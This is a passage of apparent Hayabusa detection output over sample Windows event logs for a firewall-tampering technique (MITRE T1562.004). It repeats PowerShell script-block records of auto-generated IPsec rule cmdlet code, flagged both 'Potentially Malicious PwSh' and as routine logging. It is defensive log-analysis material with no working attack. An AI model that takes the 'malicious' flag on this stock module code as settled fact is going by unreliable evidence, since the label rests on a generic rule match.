[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and 